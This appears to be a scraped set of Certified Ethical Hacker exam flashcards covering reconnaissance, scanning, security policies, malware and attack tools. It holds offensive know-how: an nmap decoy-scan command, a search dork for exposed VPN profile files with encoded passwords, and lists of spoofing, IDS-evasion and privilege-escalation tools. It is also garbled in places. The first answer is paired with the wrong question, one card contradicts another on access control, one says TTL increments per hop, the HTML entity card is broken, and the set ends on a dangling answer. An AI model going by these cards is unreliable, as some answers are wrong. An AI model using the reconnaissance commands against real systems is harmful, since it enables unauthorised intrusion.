In which stage of an ethical hack would the attacker actively apply tools and techniques to gather more in-depth information on the targets? A. Active reconnaissance B. Scanning and enumeration C. Gaining access D. Passive reconnaissance
Construction stage
In which stage of the Secure Assurance Maturity Model lifecycle are components and libraries build?
Construction stage
In which stage of the Secure Assurance Maturity Model lifecycle are components and libraries built?
Design phase
In which stage of the Secure Software Development Lifecycle is the platform and programming language chosen?
E)Cracking passwords
In which step of the CEH Hacking Methodology (CHM) do you recover the credentials for a system account? A)Covering tracks B)Hiding files C)Executing applications D)Penetration testing E)Cracking passwords F)Escalating privileges
TechSpy EmpSpy
InSpy has two functionalities: __: Crawls LinkedIn job listings for technologies used by the target company __: Crawls LinkedIn for employees working at the provided company
White Hats
Individuals professing hacker skills and using them for defensive purposes and are also known as security analysts
Suicide Hackers
Individuals who aim to bring down critical infrastructure for a "cause" and are not worried about facing jail terms or any other kind of punishment
Hacktivist
Individuals who promote a political agenda by hacking, especially by defacing or disabling websites
Gray Hats
Individuals who work both offensively and defensively at various times
Black Hats
Individuals with extraordinary computing skills, resorting to malicious or destructive activities and are also known as crackers
GiliSoft File Lock Pro
It lock files, folders, and drives; hide files, folder, and drives to make them invisible; or password protects files folders, and drives
(Inverse TCP flag) No response RST/ACK
Inverse TCP flag, if the port is open there will be ____, if the port is closed, a ____ will be sent in response.
Evaluation Assurance Level (EAL)
It provided a way for vendors to make claims about their in-place security by following a set standard of controls and testing methods. Levels 1-7
Passwords Policy
It provides guidelines for using strong password protection on organization's resources
Botnot
Is a huge network of the compromised systems used by an intruder to perform various network attacks
Defense in Depth
Is a security strategy in which several protection layers are placed throughout an information system
Incident Management
Is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore normal service operations as quickly as possible and prevent future recurrence of the incident
Enterprise Information Security Architecture (EISA)
Is a set of requirements, processes, principles, and models that determines the structure and behavior of an organizaiton's information systems
Competitive Intelligence Gathering
Is the process of identifying, gathering, analyzing, verifying, and using information about your competitors from resources such as the Internet
Identify Vulnerabilities
It allows attacker to identify vulnerabilities in the target systems in order to select appropriate exploits
Draw Network Map
It allows attackers to draw a map or outline the target organization's network infrastructure to know about the actual environment that they are going to break
decoys as well as the host(s)
It appears to the target that the ___ are scanning the network when using the IP address decoy technique
Firewall-Management Policy
It defines access, management, and monitoring of firewalls in the organization
Acceptable-Use Policy
It defines the acceptable use of system resources
User-Account Policy
It defines the account creation process, and authority, rights and responsibilities of user accounts
Access Control Policy
It defines the resources being protected and the rules that control access to them
Information-Protection Policy
It defines the sensitivity levels of information, who may have access, how is it stored and transmitted, and how should it be deleted from storage media
Remote-Access Policy
It defines who can have remote access, and defines access medium and remote access security controls
Network-Connection Policy
It defines who can install new resources on the network, approve the installation of new devices, document network changes, etc.
Paranoid Policy
It forbids everything, no internet connection, or severely limited internet usage
Daisy Chaining
It involves gaining access to one network and/or computer and then using the same information to gain access to multiple networks and computers that contain desirable information
Physical Security
It involves protection of organizational assets from environmental and man made threats
Insider Attack
It is an attack performed on a corporate network or on a single computer by an entrusted person who has authorized access to the network
Log what has occurred, consult the security policy, and act accordingly
Jim is working all night as the security administrator. He makes note of some unusual network activity at about 3 AM. Based on the unusual activity, Jim suspects an attack is underway, but he has no other evidence. How should Jim react to the situation? A)Log what has occurred and immediately call the incident response team B)Log what has occurred, consult the security policy, and act accordingly C)Log what has occurred and continue normal administrative duties D)Log what has occurred and wait for further evidence of an attack
A. DNS poisoning
Joe accesses the company website, www.anybusi.com, from his home computer and is presented with a defaced site containing disturbing images. He calls the IT department to report the website hack and is told they do not see any problem with the site--no files have been changed, and when accessed from their terminals (inside the company), the site appears normally. Joe connects over VPN into the company website and notices the site appears normally. Which of the following might explain the issue? A. DNS poisoning B. Route poisoning C. SQL injection D. ARP poisoning
B. Suicide hacker
Joe is a security engineer for a firm. His company downsizes, and Joe discovers he will be laid off within a short amount of time. Joe plants viruses and sets about destroying data and settings throughout the network, with no regard to being caught. Which type of hacker is Joe considered to be? A. Hactivist B. Suicide hacker C. Black hat D. Script kiddie
C)Insider affiliate
Joe, who does not work for your company, was able to steal an employee badge from a car in the parking lot and use it to enter the facility. What type of threat does Joe present? A)Pure insider B)Insider associate C)Insider affiliate D)Outside affiliate
name resolution
LLMNR and NBT-NS are two main elements of Windows operating systems used to perform ___ for hosts present on the same link
Responder Metasploit NBNSpoof Inweigh
LLMNR/NBT-NS Spoofing Tools
Presentation
Layer 6 of OSI model
Banner grabbing from page extensions
Looking for an extension in the URL may assist in determining the application version Example: .aspx => IIS server and Windows platform
C. The username and password fields stored in the table named users will be displayed
Log files from an attack reveal the following entry SELECT username, password FROM users; Which of the following best describes the result of this command query? A. The username and password fields will be deleted from a table named users B. A username field and a password field will be added to a table named users C. The username and password fields stored in the table named users will be displayed D. The command will not produce any results
!Host=*.* intext:enc_UserPassword=*ext"pcf
Look for .pcf files which contains user VPN profiles
allowing remote access
Necurs contains backdoor functionality, ___ and control of the infected computer
C)Public-key encryption and digital signatures
Management decides to implement a public key infrastructure (PKI) on the network. Which services will it provide? A)Private-key encryption and digital signatures B)Hashing and digital signatures C)Public-key encryption and digital signatures D)Public-key encryption and hashing
contingency plan
Management policy and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of an emergency, system failure, or disaster.
nmap -D decoy1, decoy2, decoy3,... etc.
Manually specify the IP addresses of the decoys using Nmap
Health Insurance Portability and Accountability Act (HIPAA)
Many medical facilities need to maintain compliance with the ___.
Google Earth Google Maps Bing Maps
Mapping and location-specific information, including drive-by pictures of the company exterior and overhead shots can be found where?
Spytech SpyAgent Power Spy
Name a couple of Spyware
Horse Pill GrayFish Sirefef Necurs
Name four Rootkits
logical or physical path
Network diagram shows ____ to a potential target
D. A parallel, fast ACK scan of a Class C subnet
Nmap is a powerful scanning and enumeration tool. What does the following nmap command attempt to accomplish? nmap -sA -T4 192.168.15.0/24 A. A serial, slow operating system discovery scan of a Class C subnet B. A parallel, fast operating system discovery scan of a Class C subnet C. A serial, slow ACK scan of a Class C subnet D. A parallel, fast ACK scan of a Class C subnet
-To discover live hosts, IP address, and open ports of live hosts - To discover operating systems and system architecture - To discover services running on hosts - To discover vulnerabilities in live hosts
Objectives of Network Scanning
Access creep
Occurs when authorized users accumulate excess privileges on a system because of moving from one position to another; allowances accidentally remain with the account from position to position.
rwho
On a Unix/Linux Displays a list of users who are logged in to hosts on the local network
rusers
On a Unix/Linux Displays a list of users who are logged on to remote machines or machines on local network
finger
On a Unix/Linux Displays information about system users such as user's login name, real name, terminal name, idle time, login time, office location and office phone numbers
arp -a
On a Windows machine what is the command to display your current ARP cache?
Collision domain
On a switch, each switchport represents a ____.
A)Something you have
On your advice, your company will implement a new access control mechanism for the data center. Users must provide the following evidence for authentication: Username/password credentials Smart card swipe Fingerprint scan Once in the data center, the terminal from which they access is logged and verified against a list of allowable machines. You need to justify the additional expense for the multi-factor authentication process to management. Which authentication factor does the smart card satisfy? A)Something you have B)Somewhere you are C)Something you are D)Something you know
nbtstat
On your own machine if you want to bring up a host of switches to use for information-gathering purposes using NetBIOS.
A)Current operating system
One of your ethical hackers logs into several computers using Telnet and grabs the banner on these computers. What information is the ethical hacker able to discover? A)Current operating system B)Running applications C)Currently logged-in user D)Open ports
B. Passive OS fingerprinting
One of your team members is analyzing TTL fields and TCP window sizes in order to fingerprint the OS of a target. Which of the following is most likely being attempted? A. Online OS fingerprinting B. Passive OS fingerprinting C. Aggressive OS fingerprinting D. Active OS fingerprinting
maintain persistence escalate privileges
Path interception helps an attacker to ___ on a system and ___
NS
Points to host's name server
Permissive Policy
Policy begins wide open and only known dangerous services/attacks or behaviors are blocked. It should be updated regularly to be effective
POP3 (TCP)
Port number 110
SSH (TCP)
Port number 22
Telnet (TCP)
Port number 23
LDAP (TCP, UDP)
Port number 389
Port is open (Inverse TCP Flag Scanning)
Probe Packet (FIN/URG/PSH/NULL) --> <-- No Response
C)Impersonation
Recently, your organization was the victim of a social engineering attack. Security guards allowed a power company repairman into the company to supposedly perform some tests. The repairman actually installed a network sniffer on the network. Which type of social engineering attack occurred? A)Dumpster diving B)Piggybacking C)Impersonation D)Eavesdropping
A)Detective
Requiring an audit trail in the security policy is an example of implementing which type of control? A)Detective B)Compensatory C)Preventative D)Corrective
[inurl:]
Restricts the results to documents containing the search keyword in the URL
[allintitle:]
Restricts the results to those websites with all of the search keywords in the title
Serial number
Revision number of the zone file. This number increments each time the zone file changes and is used by a secondary server to know when to update its copy.
A SID with a RID of 500 for an administrator
S-1-5-21-3874928736-367528774-1298337465-500
C) SNMPv3
SNMP provides great network management resource potential but also produces some significant security vulnerabilities. Which SNMP version provides encryption and authentication measures? A) SNMPv1 B) SNMPv2 C) SNMPv3 D) B and C E) None of the above
is the process of discovering systems on the network and taking a look at what open ports and applications may be running
Scanning
Credit card details and social security number User names and passwords Security products in use Operating systems and software versions Network layout information IP addresses and names of servers
Social engineers attempt to gather:
personal and organizational information
Social networking sites are the great source of ______
F) UDP 514
Standardized in 2001 by IETF, Syslog is a protocol for sending event messages and alerts across a network, specifically an IP network. As an ethical hacker, these log files may be of great use to you. Which transport protocol and port number should you be looking for in a packet capture to view syslog data? A) TCP 110 B) UDP 110 C) TCP 161 D) UDP 161 E) TCP 514 F) UDP 514
port 23
Telnet runs on _____.
wireless wired
The AP is connected to both the ___ LAN and the ___ LAN, providing wireless clients access to network resources.
TTL
The ___ on each packer increments by one after each hop is hit and returns.
assessment or security evaluation
The ___ phase, the actual assaults on the security controls are conducted during this time.
D. Attempt banner grabbing.
The following results are from an nmap scan: Starting nmap V. 3.10A ( www.insecure.org/nmap/ <http://www.insecure.org/nmap/> ) Interesting ports on 192.168.15.12: (The 1592 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp closed domain 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match to reliably guess the OS. Nmap run completed -- 1 IP address (1 host up) scanned in 263.46 seconds Which of the following is the best option to assist in identifying the operating system? A. Attempt an ACK scan. B. Traceroute to the system. C. Run the same nmap scan with the -vv options. D. Attempt banner grabbing.
"SYN/ACK" (Session request acknowledgment) "RST" (Reset)
The target machine will send back a ___ packet if the port is open, and an ___ packet if the port is closed
Integrity
The trustworthiness of data or resources in terms of preventing improper and unauthorized changes
C)CSRF
The use of random tokens by a web application could help prevent which type of attack? A)XSS B)SQL injection C)CSRF D)SYN flood
A)Type 3/Code 13
You are performing a ping sweep of a local subnet. Which reply message would you receive if routers are blocking ICMP? A)Type 3/Code 13 B)Type 3/Code 6 C)Type 13 D)Type 0
A. >
There are certain characters that cannot be used within text in HTML because these characters confuse the browser. In these instances, an HTML entity can be used to represent the character. Which HTML entity corresponds to the great than > character? A. > B. < C. ) D. (
Misconfiguration attacks
These attacks take advantage of systems that are, on purpose or by accident, not configured appropriately for security..
Information Audit Policy
This defines the framework for auditing security within the organization. When, where, how often, and sometimes even who conducts it are described here.
Information Security Policy
This identifies to employees what company systems may be used for, what they cannot be used for, and what the consequences are for breaking the rules. Generally employees are required to sign a copy before accessing resources. Versions of this policy are also known as an Acceptable Use Policy.
MX (Mail Exchange)
This record identifies your e-mail servers within your domain.
Inverse TCP flag (also called FIN scan or NULL scan)
This scan uses the FIN, URG, or PSH flag (or, in one version, no flags at all) to poke at system ports.
Spectre Meltdown Access Token Manipulation Application Shimming File System Permissions Weakness Path Interception Scheduled Task Launch Daemon Plist Modification Setuid and Setgid Web Shell
What are some Privilege Escalation Techniques
B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23
To search for all Telnet packets from 212.77.66.55, which Wireshark expression should be in place? (Choose all that apply) A) ip.src==212.77.66.55 and tcp.srcport==21 B) ip.src==212.77.66.55 and tcp.srcport==23 C) ip.src==212.77.66.55 && tcp.srcport==23 D) ip.src==212.77.66.55 && tcp.srcport==21
Nbtstat SuperScan Hyena Winfingerprint NetBIOS Enumerator NSAuditor
Tools for NetBIOS enumeration:
GetNotify Contact-Monkey Yesware Read Notify WhoReadMe MSGTAG Trace Email Zendio
Tools for email tracking as part of footprinting:
RemoteExec PDQ Deploy Dameware Remote Support ManageEngine Desktop Central PsExec TheFatRat
Tools for executing applications
Rankur Google Alerts Social Mention WhosTalkin ReputationDefender PR Software Naymz BrandsEye Brandyourself Talkwalker
Tools for online reputation of the target.
Proxy Switcher Proxy Workbench ProxyChains SoftCab's Proxy Chain Builder CyberGhost Proxifier
Tools used to set up proxy chains, where multiple proxies further hide your activities.
Cloud Computing Threats Advanced Persistent Threats Viruses and Worms Mobile Threats Botnet Insider Attack
Top 6 Information Security Attack Vectors
Path Analyzer Pro VisualRoute Network Pinger Magic NetTrace GEOSpider 3D Traceroute vTrace AnalogX HyperTrace Trout Network Systems Traceroute Roadkil's Trace Route Ping Plotter
Traceroute Tools
PathAnalyzer Pro VisualRoute GEO Spider Trout Magic NetTrace Ping Plotter Traceroute Tool
Traceroute Tools
ICMP protocl TTL field
Traceroute programs work on the concept of ____ and use the ____ in the header of ICMP packets to discover the routers on the path to a target host.
D. Nessus
Tracy is managing a web server and wants to search for vulnerabilities. What tool would be a good choice for her to start with? A. Black Widow B. Httrack C. BurpSuite D. Nessus
computationally less feasible
Traditional network scanning techniques will be ___ due to larger search space (64 bits of host address space or 2 ^64 addresses) provided by IPv6 in a subnet
target's customer base
Traffic monitoring helps to collect information about the ____ which help attackers to disguise as a customer and launch social engineering attacks on the target
D. The ethical hacker always obtains written permission before testing.
Two hackers attempt to crack a company's network resource security. One is considered an ethical hacker, whereas the other is not. What distinguishes the ethical hacker from the "cracker"? A. The cracker always attempts white-box testing. B. The ethical hacker always attempts black-box testing. C. The cracker posts results to the Internet. D. The ethical hacker always obtains written permission before testing.
Passive Reconnaissance Active Reconnaissance
Two types of Reconnaissance
Operating System Attacks Mis-configuration Attacks Application Level Attacks Shrink-Wrap Code Attacks
Types of Attacks on a System
find specific computers (routers, servers, etc)
Use SHODAN search engine that lets you ____ using a variety of filters.
pdf documents Microsoft Word files
Useful information may reside on the target organizaiton website in the form of ____
Connection status and content-type Accept-Ranges Last-Modified information X-Powered-By information Web server in use and its version
Using Burp Suite, Zaproxy, Paros Proxy, Website Informer, Firebub, etc. to view headers that provide what kind of information?
metadata extraction network analysis fingerprinting
Using FOCA, it is possible to undertake multiple attacks and analysis techniques such as ____, ____, DNS snooping, proxies search, ____, open directories search, etc.
normal traffic
Using Reverse HTTP Shells: This type of traffic is considered as a ___ by an organization's network perimeter security like DMZ, firewall, etc.
netstat -b
Using netstat, typing ___ lets you see the executable tied to the open port.
netstat -an
Using netstat, typing ____ displays all connections and listening ports, with addresses and port numbers in numerical form.
B)87698415
Using tcpdump, you acquire the TCP handshake and capture several packets sent between two devices in your network. The last packet you capture contains the following values: Seq no. 26556942 (next seq no. 26557263) Ack no. 87698415 Window 8700 LEN = 1656 bytes 0f data Based on this information, which sequence number will be used in the reply to this packet? A)26556942 B)87698415 C)87698416 D)26557263
Management Network Zone
Usually an area you'd find rife with VLANs and maybe controlled via IPSec and such. This is a highly secured zone with very strict policies.
A. MX
While footprinting a network, you successfully perform a zone transfer. Which DNS record in the zone transfer indicates the company's e-mail server? A. MX B. EM C. SOA D. PTR
Buffer overflow DoS attacks
Vulnerabilities in UPnP may allow attackers to launch ____ or ___
Nessus GFI LanGuard Qualys FreeScan Retina CS OpenVAS Core Impact Professional Security Manger Plus MBSA Nexpose Shadow Security Scanner SAINT Nsauditor Network Security Auditor Security Auditor's Research Assistant (SARA)
Vulnerability Scanners
Retina CS for Mobile SecurityMetrics MobileScan Nessus Vulnerability Scanner
Vulnerability Scanning Tools for Mobile
-Selectively creates custom vulnerability checks -Identifies security vulnerabilities and takes remedial action -Creates different types of scans and vulnerability tests -Helps ensure third-party security applications offer optimum protection -Performs network device vulnerability checks
What are features of GFI LanGuard?
AnyWho PeopleSmart US Search Veromi Intelius PrivateEye 411 People Search Now PeopleFinders Public Background Checks
What are some People Search Online Services?
1) Install and maintain firewall configuration to protect data. 2) Remove vendor-supplied default passwords and other default security features. 3) Protect stored data. 4) Encrypt transmission of cardholder data. 5) Install, use, and update AV (antivirus). 6) Develop secure systems and applications. 7) Use "need to know" as a guideline to restrict access to data. 8) Assign a unique ID to each stakeholder in the process (with computer access). 9) Restrict any physical access to the data. 10) Monitor all access to data and network resources holding, transmitting, or protecting it. 11) Test security procedures and systems regularly. 12) Create and maintain an information security policy.
What are the 12 requirements for groups and organizations involved in the entirety of the payment process--from card issuers, to merchants, to those storing and transmitting card information.
1) Preparation for Incident Handling and Response 2) Detection and Analysis 3) Classification and Prioritization 4) Notification 5) Containment 6) Forensic Investigation 7) Eradication and Recovery 8) Post-incident Activities
What are the Eight steps to the Incident Management Process?
Confidentiality Integrity Availability Authenticity Non-Repudiation
What are the Elements of Information Security
1) Perform risk assessment to identify risks to the organization's assets 2) Learn from standard guidelines and other organizations 3) Include senior management and all other staff in policy development 4) Set clear penalties and enforce them 5) Make final version available to all of the staff in the organization 6) Ensure every member of your staff read, sign, and understand the policy 7) Deploy tools to enforce policies 8) Train your employees and educate them about the policy 9) Regularly review and update
What are the Nine steps to Create and Implement Security Policies?
Black Hats White Hats Gray Hats Suicide Hackers Script Kiddies Cyber Terrorists State Sponsored Hackers Hacktivist
What are the eight hacker Classes?
Internet Internet DMZ Production Network Zone Intranet Zone Management Network Zone
What are the five network security zones defined by ECC?
1) Identify Security Objectives 2) Application Overview 3) Decompose Application 4) Identify Threats 5) Identify Vulnerabilities
What are the five parts of Threat Modeling?
American Registry for Internet Numbers (ARIN) Asia-Pacific Network Information Center (APNIC) Reseaux IP Europeens (RIPE) NCC Latin America and Caribbean Network Information Center (LACNIC) African Network Information Center (AfriNIC)
What are the five registrant bodies?
1) Footprinting through search engines 2) Footprinting using advanced google hacking techniques 3) Footprinting through social networking sites 4) Website footprinting 5) Email footprinting 6) Competitive intelligence 7) WHOIS footprinting 8) DNS footprinting 9) Network footprinting 10) Footprinting through social engineering
What are the ten Footprinting methodology?
Network Threats Host Threats Application Threats
What are the three Information Security Threat Categories?
Unicast Multicast Broadcast
What are the three main address types of IPv4?
Collect Network Information Collect System Information Collect Organization's Information
What are the three main objectives of footprinting?
Security Functionality Usability
What are the three parts to the triangle as one increases the others decrease
Logical safeguards, Administrative safeguards, and physical safeguards
What are the three safeguards in a risk assessments?
Signature-based and anomaly-based
What are the two detection methods used by IDS systems?
To recover keys in the event the original keys are lost or deleted, and to provide access to data to other third parties, such as law enforcement investigations
What are the two functions of key escrow?
Connectionless communication (UDP) Connection-Oriented Communication (TCP)
What are the two methods of data transfer at the Transport layer?
scalar - defines a single object tabular - defines multiple related objects grouped together in MIB tables
What are the two types of managed objects in SNMP.
TTL Window
What are the two versions of ACK flag probe?
XML filters XML gateways Ensuring a robust XML parser
What are three mitigations to a XML DoS attack?
GSA Email Spider Web Data Extractor
What are two web spider tools?
Rapid replication
What are worms typically know for?
Netstat -an
What command is used to listen to open ports with netstat?
Destination unreachable, because it is administratively prohibited (router is blocking ICMP)
What does an ICMP Type 3/Code 13 error message indicate?
Destination unreachable, because the packer requires fragmentation, but the d fragment bit is set
What does an ICMP Type 3/Code 4 error message indicate?
Risk transference
What happens when insurance is used to eliminate a risk?
Source host Contact e-mail Serial number Refresh time Retry time Expire time TTL
What information can be found in the SOA record?
Total visitors Page views Bounce rate Live visitors map Site ranking
What information can be gathered monitoring website traffic?
A)Blood vessels
What information is measured in a retina scan? A)Blood vessels B)Pupil size C)Colored ridges D)Ocular pressure
Residential address Email addresses Contact numbers Date of birth Photos Social networking profiles Blog URLs Satellite pictures of private residencies Upcoming projects Operating environment
What information is returned from doing a people search about a person or organization?
B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security
Which of the following best describes the role that the U.S. Computer Security Incident Response Team (CSIRT) provides? A. Vulnerability measurement and assessments for the U.S. Department of Defense B. A reliable and consistent point of contact for all incident response services for associates of the Department of Homeland Security C. Incident response services for all Internet providers D. Pen test registration for public and private sector
C)Filtering network packets
Which of the following can NOT be prevented by the security and privacy settings on a client's web browser? A)Running Java applets B)Cookie storage C)Filtering network packets D)Handling pop-up windows
Input validation
Which of the following can prevent bad input from being presented to an application?
A)Username and password
Which of the following combinations does NOT represent multi-factor authentication? A)Username and password B)Fingerprint scan and password C)USB token and retina scan D)USB token and password
D. lsof
Which of the following commands is the best choice to use on a Linux machine when attempting to list processes and the UIDs associated with them in a reliable manner? A. ls B. chmod C. pwd D. lsof
C) sc query
Which of the following commands lists the running services on a Windows machine? A) netsh services B) netstat -s C) sc query D) wmic bios get services
C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24
Which of the following commands would you use to quickly identify live targets on a subnet? (Choose all the apply.) A. nmap -A 172.17.24.17 B. nmap -O 172.17.24.0/24 C. nmap -sn 172.17.24.0/24 D. nmap -PI 172.17.24.0/24
C)SSL
Which of the following connection types can cause a security issue when an IDS is in the path? A)T1 B)ISDN C)SSL D)GRE tunnel
A)Announcement of a security hole in a product
Which of the following constitutes a vulnerability? A)Announcement of a security hole in a product B)Detailed description of how to exploit a product C)Instructions on how to secure a product D)List of best practices to prevent exploitation
A. Use ARPWALL. C. Use private VLANs D. Use static ARP entries.
Which of the following could provide useful defense against ARP spoofing? (Choose all that apply.) A. Use ARPWALL B. Set all NICs to promiscuous mode. C. Use private VLANs. D. Use static ARP entries.
B. Blue team
Which of the following describes security personnel who act in defense of the network during attack simulations? A. Red team B. Blue team C. Black hats D. White hats
C)Attack profile
Which of the following does NOT occur during risk assessment? A)Vulnerability identification B)Threat identification C)Attack profile D)Control analysis
B)Adherence of a company to its security policy
Which of the following does a security audit evaluate? A)Execution of the security plan B)Adherence of a company to its security policy C)Adherence of the security policy to industry standards D)Security readiness of the organization
C) Discretionary access control
Which of the following ensures that the enforcement of an organizational security policy does not rely on voluntary user compliance and secures information by assigning labels on information and comparing this to the level of security a user is operating at? A) Authorized access control B) Mandatory access control C) Discretionary access control D) Role-based access control
D)Network topology weaknesses F)Application configuration errors
Which of the following information can be gathered by a network vulnerability scanner? (Choose all that apply.) A)Spear phishing email storage B)Sensitive information sent to outside networks C)Local user account credentials D)Network topology weaknesses E)Packets received from malicious sources F)Application configuration errors
A)They are usually expensive to implement.
Which of the following is NOT a drawback to implementing anti-virus systems? A)They are usually expensive to implement. B)They rely upon signature file updates. C)They often provide limited detection techniques. D)They negatively affect the performance of the system on which they reside.
D)Server layer
Which of the following is NOT a layer of the Web application architecture? A)Client layer B)Business logic layer C)Database layer D)Server layer
C)Provides only user behavior measurement and analysis
Which of the following is NOT a limitation of a signature-based network intrusion detection system (NIDS)? A)Provides a large number of false positives B)Requires an attack signature to detect new attack types. C)Provides only user behavior measurement and analysis D)Can be defeated by network tunnels and encryption
B)Copying sensitive data to a USB drive
Which of the following is NOT a threat on a Windows file server because of a missing security patch vulnerability? A)Exposure of passwords B)Copying sensitive data to a USB drive C)Exposure of sensitive files D)Improper access to databases
C)Syntax of the certificate
Which of the following is NOT accomplished during certificate validation? A)Integrity of the certificate B)Identity of the issuer C)Syntax of the certificate D)Validity of the certificate
A)Faster than the CORBA standard
Which of the following is NOT an advantage to using SOAP? A)Faster than the CORBA standard B)Platform-independent C)Leverages multiple transport protocols D)Simplifies communications
C) TCP-over-dns
Which of the following is a client server tool utilized to evade firewall inspection? A) Kismet B) Wireshark C) TCP-over-dns D) Snow
B)XML denial of service issues
Which of the following is a common Service Oriented Architecture (SOA) vulnerability that can be addressed by filters and gateways? A)Insecure communications B)XML denial of service issues C)Replay attacks D)Information leakage
A. Audit trail
Which of the following is a detective control? A. Audit trail B. CONOPS C. Procedure D. Smartcard authentication E. Process
B) As a symmetric key algorithm, the keys would need to be sent over a different channel
Which of the following is a potential drawback to using AES to share data? A) It takes a long time to encrypt data, which slows down communication B) As a symmetric key algorithm, the keys would need to be sent over a different channel C) Configuration of AES is complicated and time-consuming to set up D) Performance is greatly affected by massive overhead
C)Tailgating
Which of the following is an attack on physical security? A)SYN flood B)Brute force C)Tailgating D)IP spoofing
B)Static WEP key
Which of the following is an example of a symmetric encryption? A)File hash B)Static WEP key C)Public key D)Private key
C)Wireshark
Which of the following is an open-source packet analyzer that can be used for network troubleshooting and analysis? A)Cain and Abel B)Nessus C)Wireshark D)CUPP
B) Single sign on
Which of the following is defined as a system where users need to remember only one user ID and password combination to be authenticated for multiple resources? A) Simple sign on B) Single sign on C) Digital sign on D) Certificate sign on
A. Mandatory access control
Which of the following is defined as ensuring the enforcement of organizational security policy does not rely on voluntary user compliance by assigning sensitivity labels on information and comparing this to the level of security a user is operating at? A. Mandatory access control B. Authorized access control C. Role-based access control D. Discretionary access control
A. DNS poisoning
Which of the following is described as the process of distributing incorrect IP addresses and name pairs with the intent of diverting traffic? A. DNS poisoning B. DNS spoofing C. Network aliasing D. Reverse Address Resolution Protocol
D)Internal website not the same as the external company website
Which of the following is evidence of a DNS poisoning attack? A)Data forwarded to the wrong switch ports B)Unusual amount of TCP SYN requests to the web server C)Traffic misdirected internally to the wrong subnet D)Internal website not the same as the external company website
D)ACLs on the router and NTFS permissions on files
Which of the following is the BEST example of defense in depth? A)Two access control lists on the same router B)Two factors required for authentication on a single system C)Two different anti-virus applications installed on every computer D)ACLs on the router and NTFS permissions on files
B)DSA
Which of the following is the Federal Information Processing Standard for digital signatures? A)AES B)DSA C)RSA D)GAK
D) Ensure services run with least privilege
Which of the following is the best choice for protection against privilege escalation vulnerabilities? A) Ensure drivers are appropriately signed B) Set admin accounts to run on least privilege C) Make maximum use of automated services D) Ensure services run with least privilege
C. Connect to a SPAN port on a switch
Which of the following is the best choice in setting an NIDS tap? A. Connect directly to a server inside the DMZ. B. Connect directly to a server in the intranet. C. Connect to a SPAN port on a switch. D. Connect to the console port of a router.
B)Sheep dipping
Which of the following is the process of analyzing suspect files for viruses and other malware? A)Purging B)Sheep dipping C)Cleaning D)Degaussing
D)Symmetric algorithm
Which of the following is true of 3DES? A)Hashing algorithm B)Stronger than AES C)Stream cipher D)Symmetric algorithm
E) All of the above
Which of the following is true regarding Kerberos? A) Kerberos makes use of UDP as a transport protocol B) Kerberos makes use of TCP as a transport protocol C) Kerberos uses port 88 for transmission of data D) Kerberos makes use of both symmetric and asymmetric encryption techniques E) All of the above
C) MX record priority increases as the preference number decreases
Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX record priority increases as the preference number decreases D) MX record entries are required for every namespace
C) MX records priority increases as the preference number decreases
Which of the following is true regarding MX records? A) MX records require an accompanying CNAME record B) MX records point to name servers C) MX records priority increases as the preference number decreases D) MX record entries are required for every namespace
A) SSL works at the transport layer and S-HTTP operates at the application layer
Which of the following is true regarding SSL and S-HTTP? A) SSL works at the transport layer and S-HTTP operates at the application layer B) SSL works at the Network layer and S-HTTP operates at the application layer C) SSL works at the application layer and S-HTTP operates at the Network layer D) SSL works at the application layer and S-HTTP operates at the transport layer
B) A POP3 client contacts the server to receive mail
Which of the following is true regarding a POP3 client? A) A POP3 client contacts the server to send mail B) A POP3 client contacts the server to receive mail C) A POP3 client contacts the server to send and receive mail D) None of the above
A. Static NAT is one to one mapping
Which of the following is true regarding static NAT? A. Static NAT is one to one mapping B. Static NAT is one to many mapping C. Static NAT is many to many mapping D. Static NAT is many to one mapping
A) The location of the Snort rules for this device is c:\ect\snort\rules
Which of the following is true regarding the Snort configuration entry shown here: val RULE_PATH c:\ect\snort\rules A) The location of the Snort rules for this device is c:\ect\snort\rules B) All rule violations should alert to c:\ect\snort\rules C) The Snort configuration file is located in c:\ect\snort\rules D) None of the above
D. traceroute
You are on a Cisco router and wish to identify the path a packet travels to a specific IP. Which of the following is the best command choice for this? A. ping B. ifconfig C. tracert D. traceroute
D. It is almost impossible to discover the sniffer on the network.
Which of the following is true regarding the discovery of sniffers on a network? A. To discover the sniffer, ping all addresses and examine latency in responses. B. To discover the sniffer, send ARP messages to all systems and watch for NOARP responses. C. To discover the sniffer, configure the IDS to watch for NICs in promiscuous mode. D. It is almost impossible to discover the sniffer on the network.
telnet
Which of the following is used for banner grabbing?
Netcraft
Which of the following is used for identifying a web server OS?
D. Base64
Which of the following is used to encode password within HTTP basic access authentication? A. MD5 B. TDM C. FDM D. Base64 E. DES
nmap
Which of the following is used to perform customized network scans?
A) A worm is malware B) A worm replicates on its own
Which of the following is/are true of a worm? A) A worm is malware B) A worm replicates on its own
C)Java
Which of the following languages poses the highest security risk because of its high penetration rate, number of documented vulnerabilities, and average user patch status? A)C++ B)C# C)Java D)Python
B)CSIRT
Which of the following organizations provides incident response services in partnership with the Department of Homeland Security? A)OWASP B)CSIRT C)NIST D)ITIL
D)More acceptance of the policy
Which of the following results when a consistent security policy has the support of executive management? A)More compressed SLAs B)More input from users C)Fewer security breaches D)More acceptance of the policy
B. MAC flooding D. ARP spoofing
Which of the following techniques can be used to gather information from a fully switched network or to disable some of the traffic isolation features of a switch? (Choose two.) A. DHCP starvation B. MAC flooding C. Promiscuous mode D. ARP spoofing
A)Token-passing network
Which of the following technologies passes a signal between nodes that authorizes each node to communicate only when the node possesses the signal? A)Token-passing network B)VPN C)Mesh network D)Star network
A. Whisker B. Fragroute E. ADMutate F. Inundator
Which of the following tools can assist with IDS evasion? (Choose all that apply.) A. Whisker B. Fragroute C. Capsa D. Wireshark E. ADMutate F. Inundator
C. TCPflow
Which of the following tools can be used to extract application layer data from TCP connections captured in a log file into separate files? A. Snort B. Netcat C. TCPflow D. Tcpdump
C. Libwhisker
Which of the following tools is the best choice to assist in evading an IDS? A. Nessus B. Nikto C. Libwhisker D. Snort
E)SwayzCryptor
